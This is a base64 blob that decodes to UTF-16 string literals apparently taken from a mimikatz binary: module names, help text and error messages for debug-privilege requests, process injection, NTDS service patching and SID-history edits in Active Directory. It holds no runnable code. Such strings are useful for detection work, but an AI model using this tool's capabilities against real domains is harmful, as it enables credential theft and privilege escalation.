AHgAKQAKAAAAAABVAHMAaQBuAGcAIAAnACUAcwAnACAAYQBzACAAaQBuAHAAdQB0ACAAZgBpAGwAZQAKAAAAAAAAACAAKgAgAE8AcgBpAGcAaQBuAGEAbAAgAHMAaQB6AGUAIAAgADoAIAAlAHUACgAAAG0AaQBtAGkAawBhAHQAegBfAHgANgA0AC4AYwBvAG0AcAByAGUAcwBzAGUAZAAAACAAKgAgAEMAbwBtAHAAcgBlAHMAcwBlAGQAIABzAGkAegBlADoAIAAlAHUAIAAoACUALgAyAGYAJQAlACkACgBVAHMAaQBuAGcAIAAnACUAcwAnACAAYQBzACAAbwB1AHQAcAB1AHQAIABmAGkAbABlAC4ALgAuACAAAAAAAAAATwBLACEACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGMAbwBtAHAAcgBlAHMAcwBtAGUAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAZwByAG8AdQBwAAAAAAAAAGEAbABpAGEAcwAAAAAAAABuAGUAdAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATwBwAGUAbgBEAG8AbQBhAGkAbgAgAEIAdQBpAGwAdABpAG4AIAAoAD8AKQAgACUAMAA4AHgACgAAAAoARABvAG0AYQBpAG4AIABuAGEAbQBlACAAOgAgACUAdwBaAAAAAAAKAEQAbwBtAGEAaQBuACAAUwBJAEQAIAAgADoAIAAAAAoAIAAlAC0ANQB1ACAAJQB3AFoAAAAAAAoAIAB8ACAAJQAtADUAdQAgAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ARwBlAHQARwByAG8AdQBwAHMARgBvAHIAVQBzAGUAcgAgACUAMAA4AHgAAAAAAAAAAAAKACAAfABgACUALQA1AHUAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBHAGUAdABBAGwAaQBhAHMATQBlAG0AYgBlAHIAcwBoAGkAcAAgACUAMAA4AHgAAAAAAAoAIAB8ALQAJQAtADUAdQAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAFIAaQBkAFQAbwBTAGkAZAAgACUAMAA4AHgAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAE8AcABlAG4AVQBzAGUAcgAgACUAMAA4AHgAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEUAbgB1AG0AZQByAGEAdABlAFUAcwBlAHIAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBPAHAAZQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBMAG8AbwBrAHUAcABEAG8AbQBhAGkAbgBJAG4AUwBhAG0AUwBlAHIAdgBlAHIAIAAlADAAOAB4AAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ARQBuAHUAbQBlAHIAYQB0AGUARABvAG0AYQBpAG4AcwBJAG4AUwBhAG0AUwBlAHIAdgBlAHIAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBDAG8AbgBuAGUAYwB0ACAAJQAwADgAeAAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AZwByAG8AdQBwACAAOwAgAFMAYQBtAEcAZQB0AE0AZQBtAGIAZQByAHMASQBuAEEAbABpAGEAcwAgACUAMAA4AHgAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAGcAcgBvAHUAcAAgADsAIABTAGEAbQBPAHAAZQBuAEcAcgBvAHUAcAAgACUAMAA4AHgAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAGcAcgBvAHUAcAAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBHAHIAbwB1AHAAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AZwByAG8AdQBwACAAOwAgAFMAYQBtAE8AcABlAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AZwByAG8AdQBwACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEQAbwBtAGEAaQBuAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBnAHIAbwB1AHAAIAA7ACAAUwBhAG0ARQBuAHUAbQBlAHIAYQB0AGUARABvAG0AYQBpAG4AcwBJAG4AUwBhAG0AUwBlAHIAdgBlAHIAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAGcAcgBvAHUAcAAgADsAIABTAGEAbQBDAG8AbgBuAGUAYwB0ACAAJQAwADgAeAAKAAAAAAAAAAoAIAB8ACAAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBhAGwAaQBhAHMAIAA7ACAAUwBhAG0ARwBlAHQATQBlAG0AYgBlAHIAcwBJAG4AQQBsAGkAYQBzACAAJQAwADgAeAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AYQBsAGkAYQBzACAAOwAgAFMAYQBtAE8AcABlAG4AQQBsAGkAYQBzACAAJQAwADgAeAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AYQBsAGkAYQBzACAAOwAgAFMAYQBtAEUAbgB1AG0AZQByAGEAdABlAEEAbABpAGEAcwBlAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBhAGwAaQBhAHMAIAA7ACAAUwBhAG0ATwBwAGUAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBhAGwAaQBhAHMAIAA7ACAAUwBhAG0ATABvAG8AawB1AHAARABvAG0AYQBpAG4ASQBuAFMAYQBtAFMAZQByAHYAZQByACAAJQAwADgAeAAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAGEAbABpAGEAcwAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBEAG8AbQBhAGkAbgBzAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AYQBsAGkAYQBzACAAOwAgAFMAYQBtAEMAbwBuAG4AZQBjAHQAIAAlADAAOAB4AAoAAAAAAAAAJQB3AFoACQAoACUAcwApAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHMAaQBtAHAAbABlAEwAbwBvAGsAdQBwACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEkAZABzAEkAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAAAAAAAAZABlAGIAdQBnAAAAAAAAAEEAcwBrACAAZABlAGIAdQBnACAAcAByAGkAdgBpAGwAZQBnAGUAAABkAHIAaQB2AGUAcgAAAAAAQQBzAGsAIABsAG8AYQBkACAAZAByAGkAdgBlAHIAIABwAHIAaQB2AGkAbABlAGcAZQAAAAAAAABBAHMAawAgAHMAZQBjAHUAcgBpAHQAeQAgAHAAcgBpAHYAaQBsAGUAZwBlAAAAAAB0AGMAYgAAAEEAcwBrACAAdABjAGIAIABwAHIAaQB2AGkAbABlAGcAZQAAAAAAAABiAGEAYwBrAHUAcAAAAAAAQQBzAGsAIABiAGEAYwBrAHUAcAAgAHAAcgBpAHYAaQBsAGUAZwBlAAAAAAAAAAAAcgBlAHMAdABvAHIAZQAAAEEAcwBrACAAcgBlAHMAdABvAHIAZQAgAHAAcgBpAHYAaQBsAGUAZwBlAAAAAAAAAHMAeQBzAGUAbgB2AAAAAAAAAAAAAAAAAEEAcwBrACAAcwB5AHMAdABlAG0AIABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIABwAHIAaQB2AGkAbABlAGcAZQAAAAAAAAAAAEEAcwBrACAAYQAgAHAAcgBpAHYAaQBsAGUAZwBlACAAYgB5ACAAaQB0AHMAIABpAGQAAAAAAAAAQQBzAGsAIABhACAAcAByAGkAdgBpAGwAZQBnAGUAIABiAHkAIABpAHQAcwAgAG4AYQBtAGUAAABwAHIAaQB2AGkAbABlAGcAZQAAAAAAAABQAHIAaQB2AGkAbABlAGcAZQAgAG0AbwBkAHUAbABlAAAAAAAAAAAAUAByAGkAdgBpAGwAZQBnAGUAIAAnACUAdQAnACAATwBLAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAGkAdgBpAGwAZQBnAGUAXwBzAGkAbQBwAGwAZQAgADsAIABSAHQAbABBAGQAagB1AHMAdABQAHIAaQB2AGkAbABlAGcAZQAgACgAJQB1ACkAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAaQB2AGkAbABlAGcAZQBfAGkAZAAgADsAIABNAGkAcwBzAGkAbgBnACAAJwBpAGQAJwAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAaQB2AGkAbABlAGcAZQBfAG4AYQBtAGUAIAA7ACAATABVAEkARAAgAGgAaQBnAGgAIABwAGEAcgB0ACAAaQBzACAAJQB1AAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAGkAdgBpAGwAZQBnAGUAXwBuAGEAbQBlACAAOwAgAEwAbwBvAGsAdQBwAFAAcgBpAHYAaQBsAGUAZwBlAFYAYQBsAHUAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAaQB2AGkAbABlAGcAZQBfAG4AYQBtAGUAIAA7ACAATQBpAHMAcwBpAG4AZwAgACcAbgBhAG0AZQAnAAoAAAAAAAAAZQB4AHAAbwByAHQAcwAAAEwAaQBzAHQAIABlAHgAcABvAHIAdABzAAAAAAAAAAAAaQBtAHAAbwByAHQAcwAAAEwAaQBzAHQAIABpAG0AcABvAHIAdABzAAAAAAAAAAAAcwB0AGEAcgB0AAAAAAAAAFMAdABhAHIAdAAgAGEAIABwAHIAbwBjAGUAcwBzAAAAcwB0AG8AcAAAAAAAAAAAAFQAZQByAG0AaQBuAGEAdABlACAAYQAgAHAAcgBvAGMAZQBzAHMAAABzAHUAcwBwAGUAbgBkAAAAUwB1AHMAcABlAG4AZAAgAGEAIABwAHIAbwBjAGUAcwBzAAAAAAAAAHIAZQBzAHUAbQBlAAAAAABSAGUAcwB1AG0AZQAgAGEAIABwAHIAbwBjAGUAcwBzAAAAAAAAAAAAUAByAG8AYwBlAHMAcwAgAG0AbwBkAHUAbABlAAAAAABUAHIAeQBpAG4AZwAgAHQAbwAgAHMAdABhAHIAdAAgACIAJQBzACIAIAA6ACAAAABPAEsAIAAhACAAKABQAEkARAAgACUAdQApAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AcwB0AGEAcgB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGMAcgBlAGEAdABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABOAHQAVABlAHIAbQBpAG4AYQB0AGUAUAByAG8AYwBlAHMAcwAAAAAATgB0AFMAdQBzAHAAZQBuAGQAUAByAG8AYwBlAHMAcwAAAAAAAAAAAE4AdABSAGUAcwB1AG0AZQBQAHIAbwBjAGUAcwBzAAAAJQBzACAAbwBmACAAJQB1ACAAUABJAEQAIAA6ACAATwBLACAAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAG4AZQByAGkAYwBPAHAAZQByAGEAdABpAG8AbgAgADsAIAAlAHMAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQBuAGUAcgBpAGMATwBwAGUAcgBhAHQAaQBvAG4AIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAG4AZQByAGkAYwBPAHAAZQByAGEAdABpAG8AbgAgADsAIABwAGkAZAAgACgALwBwAGkAZAA6ADEAMgAzACkAIABpAHMAIABtAGkAcwBzAGkAbgBnAAAAAAAAACUAdQAJACUAdwBaAAAAAAAgACgAAAAAACkAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBjAGEAbABsAGIAYQBjAGsAUAByAG8AYwBlAHMAcwAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGMAYQBsAGwAYgBhAGMAawBQAHIAbwBjAGUAcwBzACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBvAHAAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAKACUAdwBaAAAAAAAAAAAACgAJACUAcAAgAC0APgAgACUAdQAAAAAACQAlAHUAAAAJACAAAAAAAAkAJQBwAAAACQAlAFMAAAAJAC0APgAgACUAUwAAAAAACgAJACUAcAAgAC0APgAgACUAcAAJACUAUwAgACEAIAAAAAAAJQBTAAAAAAAAAAAAIwAlAHUAAABTAHQAYQByAHQAIABzAGUAcgB2AGkAYwBlAAAAAAAAAFIAZQBtAG8AdgBlACAAcwBlAHIAdgBpAGMAZQAAAAAAUwB0AG8AcAAgAHMAZQByAHYAaQBjAGUAAAAAAAAAAABTAHUAcwBwAGUAbgBkACAAcwBlAHIAdgBpAGMAZQAAAFIAZQBzAHUAbQBlACAAcwBlAHIAdgBpAGMAZQAAAAAAcAByAGUAcwBoAHUAdABkAG8AdwBuAAAAUAByAGUAcwBoAHUAdABkAG8AdwBuACAAcwBlAHIAdgBpAGMAZQAAAHMAaAB1AHQAZABvAHcAbgAAAAAAAAAAAFMAaAB1AHQAZABvAHcAbgAgAHMAZQByAHYAaQBjAGUAAAAAAAAAAABMAGkAcwB0ACAAcwBlAHIAdgBpAGMAZQBzAAAAAAAAAFMAZQByAHYAaQBjAGUAIABtAG8AZAB1AGwAZQAAAAAAJQBzACAAJwAlAHMAJwAgAHMAZQByAHYAaQBjAGUAIAA6ACAAAAAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAFMAZQByAHYAaQBjAGUAIABvAHAAZQByAGEAdABpAG8AbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABnAGUAbgBlAHIAaQBjAEYAdQBuAGMAdABpAG8AbgAgADsAIABJAG4AagBlAGMAdAAgAG4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUACgAAAAAAAABFAFIAUgBPAFIAIABnAGUAbgBlAHIAaQBjAEYAdQBuAGMAdABpAG8AbgAgADsAIABNAGkAcwBzAGkAbgBnACAAcwBlAHIAdgBpAGMAZQAgAG4AYQBtAGUAIABhAHIAZwB1AG0AZQBuAHQACgAAAAAAUwB0AGEAcgB0AGkAbgBnAAAAAAAAAAAAUgBlAG0AbwB2AGkAbgBnAAAAAAAAAAAAUwB0AG8AcABwAGkAbgBnAAAAAAAAAAAAUwB1AHMAcABlAG4AZABpAG4AZwAAAAAAUgBlAHMAdQBtAGkAbgBnAAAAAAAAAAAAUAByAGUAcwBoAHUAdABkAG8AdwBuAAAAUwBoAHUAdABkAG8AdwBuAAAAAAAAAAAAcwBlAHIAdgBpAGMAZQBzAC4AZQB4AGUAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAHMAZQBhAHIAYwBoACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAZQByAHIAbwByACAAJQB1AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAHMAZQByAHYAaQBjAGUAXwBzAGUAbgBkAGMAbwBuAHQAcgBvAGwAXwBpAG4AcAByAG8AYwBlAHMAcwAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AcwBlAHIAdgBpAGMAZQBfAHMAZQBuAGQAYwBvAG4AdAByAG8AbABfAGkAbgBwAHIAbwBjAGUAcwBzACAAOwAgAE4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUAIAB3AGkAdABoAG8AdQB0ACAAUwBjAFMAZQBuAGQAQwBvAG4AdAByAG8AbAAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAHMAZQByAHYAaQBjAGUAXwBzAGUAbgBkAGMAbwBuAHQAcgBvAGwAXwBpAG4AcAByAG8AYwBlAHMAcwAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAGwAbwBvAGsAdQBwAAAAAABOAGEAbQBlACAAbwByACAAUwBJAEQAIABsAG8AbwBrAHUAcAAAAAAAcQB1AGUAcgB5AAAAAAAAAFEAdQBlAHIAeQAgAG8AYgBqAGUAYwB0ACAAYgB5ACAAUwBJAEQAIABvAHIAIABuAGEAbQBlAAAAbQBvAGQAaQBmAHkAAAAAAE0AbwBkAGkAZgB5ACAAbwBiAGoAZQBjAHQAIABTAEkARAAgAG8AZgAgAGEAbgAgAG8AYgBqAGUAYwB0AAAAAABhAGQAZAAAAEEAZABkACAAYQAgAFMASQBEACAAdABvACAAcwBJAEQASABpAHMAdABvAHIAeQAgAG8AZgAgAGEAbgAgAG8AYgBqAGUAYwB0AAAAAAAAAAAAQwBsAGUAYQByACAAcwBJAEQASABpAHMAdABvAHIAeQAgAG8AZgAgAGEAbgAgAG8AYgBqAGUAYwB0AAAAAAAAAFAAYQB0AGMAaAAgAE4AVABEAFMAIABTAGUAcgB2AGkAYwBlAAAAAABTAGUAYwB1AHIAaQB0AHkAIABJAGQAZQBuAHQAaQBmAGkAZQByAHMAIABtAG8AZAB1AGwAZQAAAFMASQBEACAAIAAgADoAIAAlAHMACgAAAAAAAAAAAAAAVAB5AHAAZQAgACAAOgAgACUAcwAKAEQAbwBtAGEAaQBuADoAIAAlAHMACgBOAGEAbQBlACAAIAA6ACAAJQBzAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAAawB1AGwAbABfAG0AXwB0AG8AawBlAG4AXwBnAGUAdABOAGEAbQBlAEQAbwBtAGEAaQBuAEYAcgBvAG0AUwBJAEQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAASQBuAHYAYQBsAGkAZAAgAFMASQBEAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBsAG8AbwBrAHUAcAAgADsAIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAE4AYQBtAGUAIAAgADoAIAAlAHMACgAAAFQAeQBwAGUAIAAgADoAIAAlAHMACgBEAG8AbQBhAGkAbgA6ACAAJQBzAAoAUwBJAEQAIAAgACAAOgAgAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAAawB1AGwAbABfAG0AXwB0AG8AawBlAG4AXwBnAGUAdABTAGkAZABEAG8AbQBhAGkAbgBGAHIAbwBtAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAALwBzAGkAZAAgAG8AcgAgAC8AbgBhAG0AZQAgAGkAcwAgAG0AaQBzAHMAaQBuAGcACgAAAG8AYgBqAGUAYwB0AFMAaQBkAAAAAAAAAG4AZQB3AAAAAAAAAAAAAAAKACAAIAAqACAAVwBpAGwAbAAgAHQAcgB5ACAAdABvACAAbQBvAGQAaQBmAHkAIAAnACUAcwAnACAAdABvACAAJwAAAAAAAAAnADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBtAG8AZABpAGYAeQAgADsAIABsAGQAYQBwAF8AbQBvAGQAaQBmAHkAXwBzACAAMAB4ACUAeAAgACgAJQB1ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbQBvAGQAaQBmAHkAIAA7ACAASQBuAHYAYQBsAGkAZAAgAFMASQBEAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBtAG8AZABpAGYAeQAgADsAIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAG0AbwBkAGkAZgB5ACAAOwAgAC8AbgBlAHcAOgBzAGkAZAAgAGkAcwAgAG4AZQBlAGQAZQBkAAAAAAAAAAAAcwBJAEQASABpAHMAdABvAHIAeQAAAAAAAAAAAAAAAAAKACAAIAAqACAAVwBpAGwAbAAgAHQAcgB5ACAAdABvACAAYQBkAGQAIAAnACUAcwAnACAAdABoAGkAcwAgAG4AZQB3ACAAUwBJAEQAOgAnAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AYQBkAGQAIAA7ACAAbABkAGEAcABfAG0AbwBkAGkAZgB5AF8AcwAgADAAeAAlAHgAIAAoACUAdQApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AYQBkAGQAIAA7ACAASQBuAHYAYQBsAGkAZAAgAFMASQBEAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBhAGQAZAAgADsAIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgAC8AIABrAHUAbABsAF8AbQBfAHQAbwBrAGUAbgBfAGcAZQB0AFMAaQBkAEQAbwBtAGEAaQBuAEYAcgBvAG0ATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBhAGQAZAAgADsAIAAvAG4AZQB3ADoAcwBpAGQAIABvAHIAIAAvAG4AZQB3ADoAcgBlAHMAbwBsAHYAYQBiAGwAZQBfAG4AYQBtAGUAIABpAHMAIABuAGUAZQBkAGUAZAAAAAAAAAAKACAAIAAqACAAVwBpAGwAbAAgAHQAcgB5ACAAdABvACAAYwBsAGUAYQByACAAJwAlAHMAJwA6ACAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AYwBsAGUAYQByACAAOwAgAE4AbwAgAHMASQBEAEgAaQBzAHQAbwByAHkAIABhAHQAdAByAGkAYgB1AHQAZQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAGMAbABlAGEAcgAgADsAIABsAGQAYQBwAF8AbQBvAGQAaQBmAHkAXwBzACAAMAB4ACUAeAAgACgAJQB1ACkACgAAAAAAAABzAGEAbQBzAHMAAAAAAAAAbgB0AGQAcwBhAC4AZABsAGwAAAAAAAAAbgB0AGQAcwBhAGkALgBkAGwAbAAAAAAAUABhAHQAYwBoACAAMQAvADIAOgAgAAAAUABhAHQAYwBoACAAMgAvADIAOgAgAAAACgAlAHMACgAAAAAAAAAAACAAIAAlAHMAOgAgAAAAAABzAEEATQBBAGMAYwBvAHUAbgB0AE4AYQBtAGUAAAAAACUAKgBTAAoAAAAAAAAAAABvAGIAagBlAGMAdABHAFUASQBEAAAAAAAKACAAIAAgAFsAJQB1AF0AIAAAAAAAAAAgACgAIAAlAHMAIAAtAC0AIAAlAHMAXAAlAHMAIAApAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAHEAdQBpAGMAawBTAGUAYQByAGMAaAAgADsAIABOAG8AIAByAGUAcwB1AGwAdAAhACAALQAgAGYAaQBsAHQAZQByACAAdwBhAHMAIAAnACUAcwAnAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AcQB1AGkAYwBrAFMAZQBhAHIAYwBoACAAOwAgAE4AbwB0ACAAdQBuAGkAcQB1AGUAIAAtACAAUABsAGUAYQBzAGUAOgAgAGQAbwBuACcAdAAgAGIAcgBpAGMAawAgAHkAbwB1AHIAIABBAEQAIQAgAC0AIABmAGkAbAB0AGUAcgAgAHcAYQBzACAAJwAlAHMAJwAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AcQB1AGkAYwBrAFMAZQBhAHIAYwBoACAAOwAgAGwAZABhAHAAXwBzAGUAYQByAGMAaABfAHMAIAAwAHgAJQB4ACAAKAAlAHUAKQAKAAAAKABzAEEATQBBAGMAYwBvAHUAbgB0AE4AYQBtAGUAPQAlAHMAKQAAACgAbwBiAGoAZQBjAHQAUwBpAGQAPQAAAFwAJQAwADIAeAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZgBpAGwAdABlAHIARgByAG8AbQBBAHIAZwBzACAAOwAgAEkAbgB2AGEAbABpAGQAIABTAEkARAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZgBpAGwAdABlAHIARgByAG8AbQBBAHIAZwBzACAAOwAgAEMAbwBuAHYAZQByAHQAUwB0AHIAaQBuAGcAUwBpAGQAVABvAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZgBpAGwAdABlAHIARgByAG8AbQBBAHIAZwBzACAAOwAgAC8AcwBhAG0AIABvAHIAIAAvAHMAaQBkACAAdABvACAAdABhAHIAZwBlAHQAIAB0AGgAZQAgAGEAYwBjAG8AdQBuAHQAIABpAHMAIABuAGUAZQBkAGUAZAAKAAAA